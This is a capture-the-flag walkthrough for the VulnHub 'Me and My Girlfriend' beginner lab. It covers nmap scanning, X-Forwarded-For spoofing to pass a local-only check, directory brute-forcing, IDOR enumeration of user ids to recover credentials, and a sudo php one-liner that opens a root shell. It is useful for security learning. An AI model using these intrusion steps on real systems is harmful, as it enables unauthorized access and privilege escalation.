Target drone download address: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company!
Difficulty Level: Beginner
Notes: there are 2 flag files
Learning: Web Application | Simple Privilege Escalation
1: Scan for surviving hosts
Nmap -sS -Pn 192.168.158.0/24
-sS: half-open scan (non-three-way handshake tcp scan)
-sT: 3 times handshake tcp scanning
-Pn is the default target host is alive, -sP is using the ICMP protocol to send echo request packets, but it is easily filtered by the firewall. (Use -Pn when the device prohibits Ping)
nmap -T4 -A -v -p 1-65535 192.168.232.131 Detailed scan 1-65535 ports to check if there are other open ports
Check the page and find that you can not log in, you need local access
Local access methods are:
Modify the Referer field, modify the X-Forwarded-For field, etc.
View the source code to find the recommended use of X-Forwarded-For
Insert XFF field
See the main interface
Next, use the tool to scan the directory (due to the need to insert fields, so select Burp, it is recommended to use Dirsearch for fields that are not inserted). The dictionary used for blasting is also the dictionary that comes with Dirsearch. You can find it in the dc directory of Dirsearch. robot.txt directory
Check the return of robots.txt Allow: Specify the effective method of resources. 405 method for disallowed
View this heyhoo.txt
back to main interface
See log in and register, register a Kimmy account
Then try to log in
When I found that ID = 12 when logging in, I subconsciously feel that I can log in and become another account?
After clicking, check the current user status information Profile (also change the id in the package to 1) and find that the user name is no longer Kimmy:
Find Alice through Burp's blasting id
Use alice's username and password to log in to the drone and get flag1
So get the first flag, try to get the administrator permission to get the second flag
Use sudo -l ## to see the special permissions this user has
You can see that the user is granted PHP permissions and root has no password
Try to construct
Sudo php -r ‘system(“/bin/bash/”);’
Successfully enter root permissions
Thinking:
I have been in the heyhoo.txt card for a long time, and I have been thinking about how to upload a shell. I have no idea, so I tried to log in through the user name but succeeded, but the heyhoo.txt block should also be available. I still have to think about how to use it. Tools The use is still not skilled enough, and the follow-up should be strengthened.
An explanation website used by part of Nmap: https://www.cnblogs.com/nmap/p/6232969.html
The Great God Tutorial when you have no idea: https://www.freebuf.com/articles/others-articles/227157.html